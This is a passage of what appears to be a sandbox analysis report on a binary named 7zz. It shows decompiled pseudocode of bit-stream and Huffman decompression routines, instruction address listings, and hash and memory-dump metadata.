									_t514 = _t514 - _t332;
									 *(_t522 + 0x1cb4) = _t218 - _t332;
									 *(_t523 + 0x10) = _t332;
									 *(_t523 + 0x40) = _t514;
									if( *((intOrPtr*)(_t522 + 0x68)) == 0) {
										__eflags = _t332;
										if(_t332 <= 0) {
											goto L99;
										} else {
											_t515 = _t522 + 8;
											do {
												_t477 = _t515[8] >> 0x0000000f - _t515[9] >> 0x00000001 & 0x0000ffff;
												__eflags = _t477 -  *((intOrPtr*)(_t522 + 0x90));
												if(_t477 >=  *((intOrPtr*)(_t522 + 0x90))) {
													_t223 = _t522 + 0x94;
													__eflags = _t477 -  *((intOrPtr*)(_t522 + 0x94));
													_t318 = 0xa;
													if(_t477 >=  *((intOrPtr*)(_t522 + 0x94))) {
														do {
															_t405 =  *((intOrPtr*)(_t223 + 4));
															_t223 = _t223 + 4;
															_t318 = _t318 + 1;
															__eflags = _t477 - _t405;
														} while (_t477 >= _t405);
													}
												} else {
													_t318 =  *((intOrPtr*)((_t477 >> 7) + _t522 + 0xb34));
												}
												_t338 = _t515[9] + _t318;
												_t224 = _t338;
												_t515[9] = _t338;
												__eflags = _t224 - 0x10;
												while(_t224 >= 0x10) {
													_t273 =  *_t515;
													__eflags = _t273 - _t515[1];
													if(_t273 < _t515[1]) {
														_t274 = _t273 + 1;
														__eflags = _t274;
														 *(_t523 + 0x1c) =  *_t273;
														 *_t515 = _t274;
													} else {
														 *(_t523 + 0x1c) = E0040E070(_t515);
													}
													 *(_t523 + 0x24) = E00451BF0(_t515);
													_t403 = _t515[9] + 0xfffffff0;
													_t515[8] = (_t515[8] << 0x00000008 |  *(_t523 + 0x24) & 0x000000ff) << 0x00000008 |  *(_t523 + 0x1c) & 0x000000ff;
													_t224 = _t403;
													_t515[9] = _t403;
													__eflags = _t224 - 0x10;
												}
												_t480 = (_t477 -  *((intOrPtr*)(_t522 + 0x68 + _t318 * 4)) >> 0x10 - _t318) +  *((intOrPtr*)(_t522 + 0xb0 + _t318 * 4));
												__eflags = _t480 - 0x290;
												if(_t480 < 0x290) {
													_t225 =  *(_t522 + 0xf4 + _t480 * 4);
													__eflags = _t225 - 0x100;
													if(_t225 >= 0x100) {
														goto L53;
													} else {
														_t396 = _t522 + 0x30;
														 *( *((intOrPtr*)(_t522 + 0x30)) +  *((intOrPtr*)(_t522 + 0x34))) = _t225;
														_t508 =  *((intOrPtr*)(_t396 + 4)) + 1;
														 *((intOrPtr*)(_t396 + 4)) = _t508;
														__eflags = _t508 -  *((intOrPtr*)(_t396 + 8));
														if(__eflags == 0) {
															L0040EFBD(_t396, __eflags);
														}
														 *(_t523 + 0x10) =  *(_t523 + 0x10) - 1;
														goto L97;
													}
												} else {
													_t225 = _t224 | 0xffffffff;
													__eflags = _t225;
													L53:
													_t226 = _t225 + 0xffffff00;
													__eflags = _t226 -  *((intOrPtr*)(_t522 + 0x64));
													if(_t226 >=  *((intOrPtr*)(_t522 + 0x64))) {
														goto L101;
													} else {
														_t228 = _t226 & 0x00000007;
														_t320 = _t226 >> 3;
														_t92 = _t228 + 2; // -4290437306
														__eflags = (_t226 & 0x00000007) - 7;
														 *(_t523 + 0x14) = _t92;
														if((_t226 & 0x00000007) != 7) {
															L73:
															__eflags = _t320 - 3;
															if(_t320 >= 3) {
																__eflags = _t320 - 0x26;
																if(_t320 >= 0x26) {
																	_t229 = 0x11;
																	_t322 = _t320 + 0x7fde << 0x11;
																	__eflags = _t322;
																} else {
																	_t229 = (_t320 >> 1) - 1;
																	_t322 = (_t320 & 0x00000001 | 0x00000002) << _t229;
																}
																__eflags =  *(_t522 + 0x69);
																if( *(_t522 + 0x69) == 0) {
																	L91:
																	_t431 = _t515[9];
																	_t515[9] = _t431 + _t229;
																	E00450FC0(_t515);
																	_t323 = _t322 + ((_t515[8] >> 0x0000000f - _t431 & 0x0001ffff) >> 0x11 - _t229);
																	__eflags = _t323;
																	 *(_t523 + 0x18) = _t323;
																	goto L92;
																} else {
																	__eflags = _t229 - 3;
																	if(_t229 < 3) {
																		goto L91;
																	} else {
																		_t437 = _t515[9];
																		_t238 = _t229 + 0xfffffffd;
																		_t239 = _t238 + _t437;
																		_t515[9] = _t239;
																		_t489 = (_t515[8] >> 0x0000000f - _t437 & 0x0001ffff) >> 0x11 - _t238;
																		__eflags = _t239 - 0x10;
																		if(_t239 >= 0x10) {
																			do {
																				 *(_t523 + 0x30) = E00451BF0(_t515);
																				 *(_t523 + 0x2c) = E00451BF0(_t515);
																				_t379 = _t515[9] + 0xfffffff0;
																				_t515[8] = (_t515[8] << 0x00000008 |  *(_t523 + 0x2c) & 0x000000ff) << 0x00000008 |  *(_t523 + 0x30) & 0x000000ff;
																				__eflags = _t379 - 0x10;
																				_t515[9] = _t379;
																			} while (_t379 >= 0x10);
																		}
																		 *(_t523 + 0x18) = _t322 + _t489 * 8;
																		_t493 = _t515[8] >> 0x0000000f - _t515[9] >> 0x00000001 & 0x0000ffff;
																		__eflags = _t493 -  *((intOrPtr*)(_t522 + 0x13c4));
																		if(_t493 >=  *((intOrPtr*)(_t522 + 0x13c4))) {
																			_t243 = _t522 + 0x13c8;
																			__eflags = _t493 -  *((intOrPtr*)(_t522 + 0x13c8));
																			_t325 = 0xa;
																			if(_t493 >=  *((intOrPtr*)(_t522 + 0x13c8))) {
																				do {
																					_t371 =  *((intOrPtr*)(_t243 + 4));
																					_t243 = _t243 + 4;
																					_t325 = _t325 + 1;
																					__eflags = _t493 - _t371;
																				} while (_t493 >= _t371);
																			}
																		} else {
																			_t325 =  *((intOrPtr*)((_t493 >> 7) + _t522 + 0x1448));
																		}
																		_t361 = _t515[9] + _t325;
																		_t515[9] = _t361;
																		__eflags = _t361 - 0x10;
																		if(_t361 >= 0x10) {
																			do {
																				 *(_t523 + 0x38) = E00451BF0(_t515);
																				 *(_t523 + 0x34) = E00451BF0(_t515);
																				_t370 = _t515[9] + 0xfffffff0;
																				_t515[8] = (_t515[8] << 0x00000008 |  *(_t523 + 0x34) & 0x000000ff) << 0x00000008 |  *(_t523 + 0x38) & 0x000000ff;
																				_t515[9] = _t370;
																				__eflags = _t370 - 0x10;
																			} while (_t370 >= 0x10);
																		}
																		_t496 = (_t493 -  *((intOrPtr*)(_t522 + 0x139c + _t325 * 4)) >> 0x10 - _t325) +  *((intOrPtr*)(_t522 + 0x13e4 + _t325 * 4));
																		__eflags = _t496 - 8;
																		if(_t496 >= 8) {
																			goto L101;
																		} else {
																			_t497 =  *((intOrPtr*)(_t522 + 0x1428 + _t496 * 4));
																			__eflags = _t497 - 8;
																			if(_t497 >= 8) {
																				goto L101;
																			} else {
																				 *(_t523 + 0x18) =  *(_t523 + 0x18) + _t497;
																				L92:
																				_t351 =  *(_t523 + 0x18) + 0xfffffffd;
																				__eflags = _t351;
																				 *(_t522 + 0x60) =  *(_t522 + 0x5c);
																				 *(_t522 + 0x5c) =  *(_t522 + 0x58);
																				 *(_t522 + 0x58) = _t351;
																				goto L93;
																			}
																		}
																	}
																}
															} else {
																 *(_t522 + 0x58 + _t320 * 4) =  *(_t522 + 0x58);
																 *(_t522 + 0x58) =  *(_t522 + 0x58 + _t320 * 4);
																L93:
																_t485 =  *(_t523 + 0x14);
																_t232 =  *(_t523 + 0x10);
																__eflags = _t485 - _t232;
																if(_t485 > _t232) {
																	_t485 = _t232;
																}
																_push(_t485);
																_push( *(_t522 + 0x58));
																_t233 = L0044ADB0(_t522 + 0x30);
																__eflags = _t233;
																if(_t233 == 0) {
																	goto L101;
																} else {
																	_t235 =  *(_t523 + 0x14) - _t485;
																	__eflags = _t235;
																	 *(_t523 + 0x14) = _t235;
																	 *(_t523 + 0x10) =  *(_t523 + 0x10) - _t485;
																	if(_t235 != 0) {
																		 *(_t522 + 0x1cbc) =  *(_t523 + 0x14);
																		goto L103;
																	} else {
																		goto L97;
																	}
																}
															}
														} else {
															_t501 = _t515[8] >> 0x0000000f - _t515[9] >> 0x00000001 & 0x0000ffff;
															__eflags = _t501 -  *((intOrPtr*)(_t522 + 0xd58));
															if(_t501 >=  *((intOrPtr*)(_t522 + 0xd58))) {
																_t383 = _t522 + 0xd5c;
																_t262 = 0xa;
																__eflags = _t501 -  *((intOrPtr*)(_t522 + 0xd5c));
																 *(_t523 + 0x18) = 0xa;
																if(_t501 >=  *((intOrPtr*)(_t522 + 0xd5c))) {
																	do {
																		_t455 =  *((intOrPtr*)(_t383 + 4));
																		_t383 = _t383 + 4;
																		_t262 = _t262 + 1;
																		__eflags = _t501 - _t455;
																	} while (_t501 >= _t455);
																	goto L63;
																}
															} else {
																_t262 =  *((intOrPtr*)((_t501 >> 7) + _t522 + 0x11a0));
																L63:
																 *(_t523 + 0x18) = _t262;
															}
															_t449 = _t515[9] + _t262;
															_t515[9] = _t449;
															__eflags = _t449 - 0x10;
															if(_t449 >= 0x10) {
																do {
																	_t263 =  *_t515;
																	__eflags = _t263 - _t515[1];
																	if(_t263 < _t515[1]) {
																		_t264 = _t263 + 1;
																		__eflags = _t264;
																		 *(_t523 + 0x20) =  *_t263;
																		 *_t515 = _t264;
																	} else {
																		 *(_t523 + 0x20) = E0040E070(_t515);
																	}
																	 *(_t523 + 0x28) = E00451BF0(_t515);
																	_t394 = _t515[9] + 0xfffffff0;
																	_t515[8] = (_t515[8] << 0x00000008 |  *(_t523 + 0x28) & 0x000000ff) << 0x00000008 |  *(_t523 + 0x20) & 0x000000ff;
																	_t515[9] = _t394;
																	__eflags = _t394 - 0x10;
																} while (_t394 >= 0x10);
																_t262 =  *(_t523 + 0x18);
															}
															_t504 = (_t501 -  *((intOrPtr*)(_t522 + 0xd30 + _t262 * 4)) >> 0x10 - _t262) +  *((intOrPtr*)(_t522 + 0xd78 + _t262 * 4));
															__eflags = _t504 - 0xf9;
															if(_t504 >= 0xf9) {
																goto L101;
															} else {
																_t505 =  *((intOrPtr*)(_t522 + 0xdbc + _t504 * 4));
																__eflags = _t505 - 0xf9;
																if(_t505 >= 0xf9) {
																	goto L101;
																} else {
																	_t138 = _t523 + 0x14;
																	 *_t138 =  *(_t523 + 0x14) + _t505;
																	__eflags =  *_t138;
																	goto L73;
																}
															}
														}
													}
												}
												goto L104;
												L97:
												__eflags =  *(_t523 + 0x10);
											} while ( *(_t523 + 0x10) > 0);
											goto L98;
										}
									} else {
										if(_t332 > 0) {
											_t473 = _t522 + 8;
											_t516 = _t522 + 0x30;
											_t317 = _t332;
											do {
												_t406 =  *_t473;
												if(_t406 < _t473[1]) {
													_t282 =  *_t406;
													_t407 = _t406 + 1;
													__eflags = _t407;
													 *_t473 = _t407;
												} else {
													_t282 = E0040E070(_t473);
												}
												 *((char*)( *_t516 +  *((intOrPtr*)(_t516 + 4)))) = _t282;
												_t430 =  *((intOrPtr*)(_t516 + 4)) + 1;
												 *((intOrPtr*)(_t516 + 4)) = _t430;
												_t550 = _t430 -  *((intOrPtr*)(_t516 + 8));
												if(_t430 ==  *((intOrPtr*)(_t516 + 8))) {
													L0040EFBD(_t516, _t550);
												}
												_t317 = _t317 - 1;
											} while (_t317 != 0);
											L98:
											_t514 =  *(_t523 + 0x40);
										}
										L99:
										if(_t514 <= 0) {
											goto L103;
										} else {
											continue;
										}
									}
									goto L104;
								}
								L101:
								return 1;
							}
						}
						goto L104;
					}
					L103:
					__eflags = 0;
					return 0;
				}
				L104:
			}















































































                                                                                                                                    0x004514f5
                                                                                                                                    0x0045150c
                                                                                                                                    0x00451512
                                                                                                                                    0x00451515
                                                                                                                                    0x00451521
                                                                                                                                    0x00451526
                                                                                                                                    0x00451535
                                                                                                                                    0x00451541
                                                                                                                                    0x00451543
                                                                                                                                    0x00451543
                                                                                                                                    0x0045154a
                                                                                                                                    0x0045155b
                                                                                                                                    0x0045155b
                                                                                                                                    0x0045155c
                                                                                                                                    0x00451560
                                                                                                                                    0x0045154c
                                                                                                                                    0x00451553
                                                                                                                                    0x00451553
                                                                                                                                    0x00451562
                                                                                                                                    0x00451569
                                                                                                                                    0x0045157a
                                                                                                                                    0x0045157a
                                                                                                                                    0x0045157b
                                                                                                                                    0x0045157f
                                                                                                                                    0x0045156b
                                                                                                                                    0x00451572
                                                                                                                                    0x00451572
                                                                                                                                    0x004515a3
                                                                                                                                    0x004515a7
                                                                                                                                    0x004515aa
                                                                                                                                    0x004515af
                                                                                                                                    0x00451543
                                                                                                                                    0x00451541
                                                                                                                                    0x004515bb
                                                                                                                                    0x004515bf
                                                                                                                                    0x004515c6
                                                                                                                                    0x004515d0
                                                                                                                                    0x004515db
                                                                                                                                    0x004515e2
                                                                                                                                    0x004515e4
                                                                                                                                    0x004515f1
                                                                                                                                    0x004515f6
                                                                                                                                    0x004515fb
                                                                                                                                    0x0045160d
                                                                                                                                    0x0045160d
                                                                                                                                    0x004515f6
                                                                                                                                    0x0045160f
                                                                                                                                    0x00451617
                                                                                                                                    0x0045161a
                                                                                                                                    0x0045161d
                                                                                                                                    0x00451620
                                                                                                                                    0x00451625
                                                                                                                                    0x00451628
                                                                                                                                    0x0045162b
                                                                                                                                    0x0045162b
                                                                                                                                    0x004515bb
                                                                                                                                    0x00451636
                                                                                                                                    0x00451695
                                                                                                                                    0x00000000
                                                                                                                                    0x00451638
                                                                                                                                    0x00451638
                                                                                                                                    0x00451638
                                                                                                                                    0x0045163e
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0045164a
                                                                                                                                    0x0045164f
                                                                                                                                    0x00451650
                                                                                                                                    0x00451655
                                                                                                                                    0x00451657
                                                                                                                                    0x00451657
                                                                                                                                    0x00451663
                                                                                                                                    0x0045166c
                                                                                                                                    0x0045166f
                                                                                                                                    0x00451672
                                                                                                                                    0x00451674
                                                                                                                                    0x00451676
                                                                                                                                    0x00451676
                                                                                                                                    0x00451681
                                                                                                                                    0x00451682
                                                                                                                                    0x00451685
                                                                                                                                    0x0045168d
                                                                                                                                    0x00451691
                                                                                                                                    0x00000000
                                                                                                                                    0x00451693
                                                                                                                                    0x00451699
                                                                                                                                    0x0045169b
                                                                                                                                    0x00000000
                                                                                                                                    0x004516a1
                                                                                                                                    0x004516a1
                                                                                                                                    0x004516ba
                                                                                                                                    0x004516c2
                                                                                                                                    0x004516c4
                                                                                                                                    0x004516c6
                                                                                                                                    0x004516c6
                                                                                                                                    0x004516ca
                                                                                                                                    0x004516cc
                                                                                                                                    0x004516d7
                                                                                                                                    0x004516db
                                                                                                                                    0x004516df
                                                                                                                                    0x0045172f
                                                                                                                                    0x00451731
                                                                                                                                    0x00000000
                                                                                                                                    0x00451737
                                                                                                                                    0x00451737
                                                                                                                                    0x0045173a
                                                                                                                                    0x00451751
                                                                                                                                    0x00451757
                                                                                                                                    0x00451759
                                                                                                                                    0x00451771
                                                                                                                                    0x00451777
                                                                                                                                    0x00451779
                                                                                                                                    0x0045177e
                                                                                                                                    0x00451780
                                                                                                                                    0x00451780
                                                                                                                                    0x00451783
                                                                                                                                    0x00451786
                                                                                                                                    0x00451787
                                                                                                                                    0x00451787
                                                                                                                                    0x00451780
                                                                                                                                    0x0045175b
                                                                                                                                    0x00451762
                                                                                                                                    0x00451762
                                                                                                                                    0x0045178e
                                                                                                                                    0x00451790
                                                                                                                                    0x00451792
                                                                                                                                    0x00451795
                                                                                                                                    0x00451798
                                                                                                                                    0x0045179a
                                                                                                                                    0x0045179f
                                                                                                                                    0x004517a1
                                                                                                                                    0x004517b2
                                                                                                                                    0x004517b2
                                                                                                                                    0x004517b3
                                                                                                                                    0x004517b7
                                                                                                                                    0x004517a3
                                                                                                                                    0x004517aa
                                                                                                                                    0x004517aa
                                                                                                                                    0x004517c7
                                                                                                                                    0x004517e7
                                                                                                                                    0x004517ea
                                                                                                                                    0x004517ed
                                                                                                                                    0x004517ef
                                                                                                                                    0x004517f2
                                                                                                                                    0x004517f2
                                                                                                                                    0x00451806
                                                                                                                                    0x0045180d
                                                                                                                                    0x00451813
                                                                                                                                    0x00451871
                                                                                                                                    0x00451878
                                                                                                                                    0x0045187d
                                                                                                                                    0x00000000
                                                                                                                                    0x0045187f
                                                                                                                                    0x00451885
                                                                                                                                    0x00451888
                                                                                                                                    0x00451891
                                                                                                                                    0x00451894
                                                                                                                                    0x00451897
                                                                                                                                    0x00451899
                                                                                                                                    0x0045189b
                                                                                                                                    0x0045189b
                                                                                                                                    0x004518a0
                                                                                                                                    0x00000000
                                                                                                                                    0x004518a0
                                                                                                                                    0x00451815
                                                                                                                                    0x00451815
                                                                                                                                    0x00451815
                                                                                                                                    0x00451818
                                                                                                                                    0x0045181b
                                                                                                                                    0x00451820
                                                                                                                                    0x00451822
                                                                                                                                    0x00000000
                                                                                                                                    0x00451828
                                                                                                                                    0x0045182a
                                                                                                                                    0x0045182d
                                                                                                                                    0x00451830
                                                                                                                                    0x00451833
                                                                                                                                    0x00451836
                                                                                                                                    0x0045183a
                                                                                                                                    0x0045197d
                                                                                                                                    0x0045197d
                                                                                                                                    0x00451980
                                                                                                                                    0x00451995
                                                                                                                                    0x00451998
                                                                                                                                    0x004519b1
                                                                                                                                    0x004519b6
                                                                                                                                    0x004519b6
                                                                                                                                    0x0045199a
                                                                                                                                    0x004519a1
                                                                                                                                    0x004519a7
                                                                                                                                    0x004519a7
                                                                                                                                    0x004519bc
                                                                                                                                    0x004519be
                                                                                                                                    0x00451b2a
                                                                                                                                    0x00451b2a
                                                                                                                                    0x00451b40
                                                                                                                                    0x00451b4f
                                                                                                                                    0x00451b54
                                                                                                                                    0x00451b54
                                                                                                                                    0x00451b56
                                                                                                                                    0x00000000
                                                                                                                                    0x004519c4
                                                                                                                                    0x004519c4
                                                                                                                                    0x004519c7
                                                                                                                                    0x00000000
                                                                                                                                    0x004519cd
                                                                                                                                    0x004519cd
                                                                                                                                    0x004519d8
                                                                                                                                    0x004519e6
                                                                                                                                    0x004519e8
                                                                                                                                    0x004519f1
                                                                                                                                    0x004519f3
                                                                                                                                    0x004519f6
                                                                                                                                    0x004519f8
                                                                                                                                    0x00451a01
                                                                                                                                    0x00451a0e
                                                                                                                                    0x00451a32
                                                                                                                                    0x00451a35
                                                                                                                                    0x00451a3a
                                                                                                                                    0x00451a3d
                                                                                                                                    0x00451a3d
                                                                                                                                    0x004519f8
                                                                                                                                    0x00451a48
                                                                                                                                    0x00451a60
                                                                                                                                    0x00451a66
                                                                                                                                    0x00451a68
                                                                                                                                    0x00451a80
                                                                                                                                    0x00451a86
                                                                                                                                    0x00451a88
                                                                                                                                    0x00451a8d
                                                                                                                                    0x00451a8f
                                                                                                                                    0x00451a8f
                                                                                                                                    0x00451a92
                                                                                                                                    0x00451a95
                                                                                                                                    0x00451a96
                                                                                                                                    0x00451a96
                                                                                                                                    0x00451a8f
                                                                                                                                    0x00451a6a
                                                                                                                                    0x00451a71
                                                                                                                                    0x00451a71
                                                                                                                                    0x00451a9d
                                                                                                                                    0x00451aa1
                                                                                                                                    0x00451aa4
                                                                                                                                    0x00451aa7
                                                                                                                                    0x00451aa9
                                                                                                                                    0x00451ab2
                                                                                                                                    0x00451ac2
                                                                                                                                    0x00451ae2
                                                                                                                                    0x00451ae5
                                                                                                                                    0x00451aea
                                                                                                                                    0x00451aed
                                                                                                                                    0x00451aed
                                                                                                                                    0x00451aa9
                                                                                                                                    0x00451b04
                                                                                                                                    0x00451b0b
                                                                                                                                    0x00451b0e
                                                                                                                                    0x00000000
                                                                                                                                    0x00451b14
                                                                                                                                    0x00451b14
                                                                                                                                    0x00451b1b
                                                                                                                                    0x00451b1e
                                                                                                                                    0x00000000
                                                                                                                                    0x00451b24
                                                                                                                                    0x00451b24
                                                                                                                                    0x00451b5a
                                                                                                                                    0x00451b64
                                                                                                                                    0x00451b64
                                                                                                                                    0x00451b67
                                                                                                                                    0x00451b6a
                                                                                                                                    0x00451b6d
                                                                                                                                    0x00000000
                                                                                                                                    0x00451b6d
                                                                                                                                    0x00451b1e
                                                                                                                                    0x00451b0e
                                                                                                                                    0x004519c7
                                                                                                                                    0x00451982
                                                                                                                                    0x00451989
                                                                                                                                    0x0045198d
                                                                                                                                    0x00451b70
                                                                                                                                    0x00451b70
                                                                                                                                    0x00451b74
                                                                                                                                    0x00451b78
                                                                                                                                    0x00451b7a
                                                                                                                                    0x00451b7c
                                                                                                                                    0x00451b7c
                                                                                                                                    0x00451b81
                                                                                                                                    0x00451b82
                                                                                                                                    0x00451b86
                                                                                                                                    0x00451b8b
                                                                                                                                    0x00451b8d
                                                                                                                                    0x00000000
                                                                                                                                    0x00451b8f
                                                                                                                                    0x00451b97
                                                                                                                                    0x00451b9b
                                                                                                                                    0x00451b9d
                                                                                                                                    0x00451ba1
                                                                                                                                    0x00451ba5
                                                                                                                                    0x00451bd3
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00451ba5
                                                                                                                                    0x00451b8d
                                                                                                                                    0x00451840
                                                                                                                                    0x00451857
                                                                                                                                    0x0045185d
                                                                                                                                    0x0045185f
                                                                                                                                    0x004518af
                                                                                                                                    0x004518b5
                                                                                                                                    0x004518ba
                                                                                                                                    0x004518bc
                                                                                                                                    0x004518c0
                                                                                                                                    0x004518c2
                                                                                                                                    0x004518c2
                                                                                                                                    0x004518c5
                                                                                                                                    0x004518c8
                                                                                                                                    0x004518c9
                                                                                                                                    0x004518c9
                                                                                                                                    0x00000000
                                                                                                                                    0x004518c2
                                                                                                                                    0x00451861
                                                                                                                                    0x00451868
                                                                                                                                    0x004518cd
                                                                                                                                    0x004518cd
                                                                                                                                    0x004518cd
                                                                                                                                    0x004518d4
                                                                                                                                    0x004518d8
                                                                                                                                    0x004518db
                                                                                                                                    0x004518de
                                                                                                                                    0x004518e0
                                                                                                                                    0x004518e0
                                                                                                                                    0x004518e5
                                                                                                                                    0x004518e7
                                                                                                                                    0x004518f8
                                                                                                                                    0x004518f8
                                                                                                                                    0x004518f9
                                                                                                                                    0x004518fd
                                                                                                                                    0x004518e9
                                                                                                                                    0x004518f0
                                                                                                                                    0x004518f0
                                                                                                                                    0x0045190d
                                                                                                                                    0x0045192d
                                                                                                                                    0x00451930
                                                                                                                                    0x00451935
                                                                                                                                    0x00451938
                                                                                                                                    0x00451938
                                                                                                                                    0x0045193d
                                                                                                                                    0x0045193d
                                                                                                                                    0x00451953
                                                                                                                                    0x0045195a
                                                                                                                                    0x00451960
                                                                                                                                    0x00000000
                                                                                                                                    0x00451966
                                                                                                                                    0x00451966
                                                                                                                                    0x0045196d
                                                                                                                                    0x00451973
                                                                                                                                    0x00000000
                                                                                                                                    0x00451979
                                                                                                                                    0x00451979
                                                                                                                                    0x00451979
                                                                                                                                    0x00451979
                                                                                                                                    0x00000000
                                                                                                                                    0x00451979
                                                                                                                                    0x00451973
                                                                                                                                    0x00451960
                                                                                                                                    0x0045183a
                                                                                                                                    0x00451822
                                                                                                                                    0x00000000
                                                                                                                                    0x00451ba7
                                                                                                                                    0x00451bab
                                                                                                                                    0x00451bab
                                                                                                                                    0x00000000
                                                                                                                                    0x0045173a
                                                                                                                                    0x004516e1
                                                                                                                                    0x004516e3
                                                                                                                                    0x004516e9
                                                                                                                                    0x004516ec
                                                                                                                                    0x004516ef
                                                                                                                                    0x004516f1
                                                                                                                                    0x004516f1
                                                                                                                                    0x004516f8
                                                                                                                                    0x00451703
                                                                                                                                    0x00451705
                                                                                                                                    0x00451705
                                                                                                                                    0x00451706
                                                                                                                                    0x004516fa
                                                                                                                                    0x004516fc
                                                                                                                                    0x004516fc
                                                                                                                                    0x0045170d
                                                                                                                                    0x00451716
                                                                                                                                    0x00451719
                                                                                                                                    0x0045171c
                                                                                                                                    0x0045171e
                                                                                                                                    0x00451722
                                                                                                                                    0x00451722
                                                                                                                                    0x00451727
                                                                                                                                    0x00451727
                                                                                                                                    0x00451bb3
                                                                                                                                    0x00451bb3
                                                                                                                                    0x00451bb3
                                                                                                                                    0x00451bb7
                                                                                                                                    0x00451bb9
                                                                                                                                    0x00000000
                                                                                                                                    0x00451bbb
                                                                                                                                    0x00000000
                                                                                                                                    0x00451bbb
                                                                                                                                    0x00451bb9
                                                                                                                                    0x00000000
                                                                                                                                    0x004516df
                                                                                                                                    0x00451bc3
                                                                                                                                    0x00451bcc
                                                                                                                                    0x00451bcc
                                                                                                                                    0x0045169b
                                                                                                                                    0x00000000
                                                                                                                                    0x00451691
                                                                                                                                    0x00451bdc
                                                                                                                                    0x00451bdc
                                                                                                                                    0x00451be2
                                                                                                                                    0x00451be2
                                                                                                                                    0x00000000

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cf9465c887767747944f02be8cd1883d1280c098b0c5e3f404be3679971bfc79
                                                                                                                                    • Instruction ID: 56e6f142235e9d3d76dd4b9a838b0ae8b43fc399745457aca84a280bb1d57964
                                                                                                                                    • Opcode Fuzzy Hash: cf9465c887767747944f02be8cd1883d1280c098b0c5e3f404be3679971bfc79
                                                                                                                                    • Instruction Fuzzy Hash: 3E22C9317046458FC728CF2DC5907AA77E2AFC5305F144A2EE89AC7792D738E849CB89
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00461EF0 Relevance: .6, Instructions: 556COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                    			E00461EF0() {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t294;
				intOrPtr _t295;
				signed int _t296;
				signed int _t300;
				unsigned int _t304;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				unsigned int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t324;
				signed int _t327;
				void* _t329;
				void* _t338;
				signed int _t351;
				unsigned int _t353;
				signed int _t355;
				signed int _t356;
				unsigned int _t358;
				signed int _t360;
				unsigned int _t362;
				signed int _t364;
				signed int _t374;
				signed int _t376;
				signed int _t377;
				signed int _t380;
				signed int _t382;
				signed int _t383;
				signed int _t388;
				signed int _t390;
				signed int _t392;
				signed int _t394;
				signed int _t395;
				intOrPtr* _t398;
				signed int _t405;
				signed int _t407;
				signed int _t410;
				signed int _t411;
				signed int _t417;
				void* _t422;
				signed int _t425;
				signed int _t428;
				signed int _t438;
				signed int _t449;
				signed int _t452;
				signed int* _t459;
				signed int _t474;
				signed int _t479;
				signed int _t484;
				signed int _t500;
				unsigned int _t508;
				signed int _t510;
				signed int _t525;
				void* _t537;
				signed int _t539;
				unsigned int _t550;
				unsigned int _t553;
				unsigned int _t555;
				signed int _t562;
				signed int _t570;
				signed int _t589;
				signed short* _t604;
				unsigned int _t605;
				signed int* _t606;
				signed short* _t612;
				signed short* _t613;
				signed int* _t622;
				intOrPtr* _t624;
				void* _t625;

				_t624 =  *((intOrPtr*)(_t625 + 0x1c));
				if( *((intOrPtr*)(_t624 + 0x3bd10)) != 0) {
					 *((intOrPtr*)( *_t624))();
					 *((intOrPtr*)(_t624 + 0x3bd10)) = 0;
				}
				_t294 =  *((intOrPtr*)(_t624 + 0x3bd04));
				if( *((intOrPtr*)(_t624 + 0x3bcfc)) != 0 || _t294 != 0) {
					return _t294;
				} else {
					if( *((intOrPtr*)(_t624 + 0x3bce0)) != _t294) {
						 *((intOrPtr*)(_t624 + 0x3bd04)) = 9;
					}
					if( *((intOrPtr*)(_t624 + 0x208)) != 0) {
						 *((intOrPtr*)(_t624 + 0x3bd04)) = 8;
					}
					_t295 =  *((intOrPtr*)(_t624 + 0x3bd04));
					if(_t295 == 0) {
						_t589 =  *(_t624 + 0x3bcf0);
						__eflags = _t589 |  *(_t624 + 0x3bcf4);
						 *(_t625 + 0x10) = _t589;
						 *(_t625 + 0x18) = _t589;
						if((_t589 |  *(_t624 + 0x3bcf4)) != 0) {
							L16:
							_t296 =  *( *(_t624 + 8))(_t422);
							__eflags = _t296;
							if(_t296 == 0) {
								L82:
								_t288 = _t624 + 0x3bcf0;
								 *_t288 =  *(_t624 + 0x3bcf0) + _t589 -  *((intOrPtr*)(_t625 + 0x1c));
								__eflags =  *_t288;
								asm("adc dword [ebp+0x3bcf4], 0x0");
								return E00461A80(_t624, _t589);
							}
							while(1) {
								__eflags =  *(_t624 + 0x3bca8);
								if( *(_t624 + 0x3bca8) == 0) {
									_push(_t625 + 0x10);
									_push(_t589);
									_push(_t624);
									_t300 = E004602E0();
								} else {
									_push(_t625 + 0x10);
									_t300 = E004615B0(_t624);
								}
